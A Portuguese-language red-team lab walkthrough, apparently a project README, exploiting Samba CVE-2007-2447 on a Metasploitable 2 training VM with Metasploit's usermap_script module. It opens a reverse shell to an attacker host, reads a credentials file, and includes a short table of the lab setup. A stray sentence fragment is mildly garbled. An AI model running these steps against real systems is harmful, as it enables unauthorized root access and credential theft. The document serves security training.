
Laboratório de testes de penetração passo a passo explorando o Samba CVE-2007-2447 no Metasploitable 2 usando Metasploit, demonstrando comprometimento de root, roubo de credenciais e exfiltração de dados para treinamento educacional de red team.
RedTeam-SMB-PenTest |
|
msfconsole
Certifique-se de que tanto o host atacante quanto a máquina vítima estejam inicializados e em execução.

search samba
use exploit/multi/samba/usermap_script
set RHOST <target_ip>
set LHOST <attacker_ip>
set payload cmd/unix/reverse
exploit
whoami
hostname
cd /redteam7/student3
cat mypass.txt
# Leave current shell
Ctrl C
exit
# Kill all background jobs
sessions -K
jobs -K
# Restart Metasploit
msfconsole
usermap_script são altamente vulneráveis.| Componente | Detalhes |
|---|
| Atacante VM | Kali Linux |
| Vítima VM | Metasploitable 2 |
| Porta Alvo | 445 (Samba/SMB) |
| Exploit Usado | exploit/multi/samba/usermap_script |
| Alvo de Credenciais | /redteam7/student3/mypass.txt |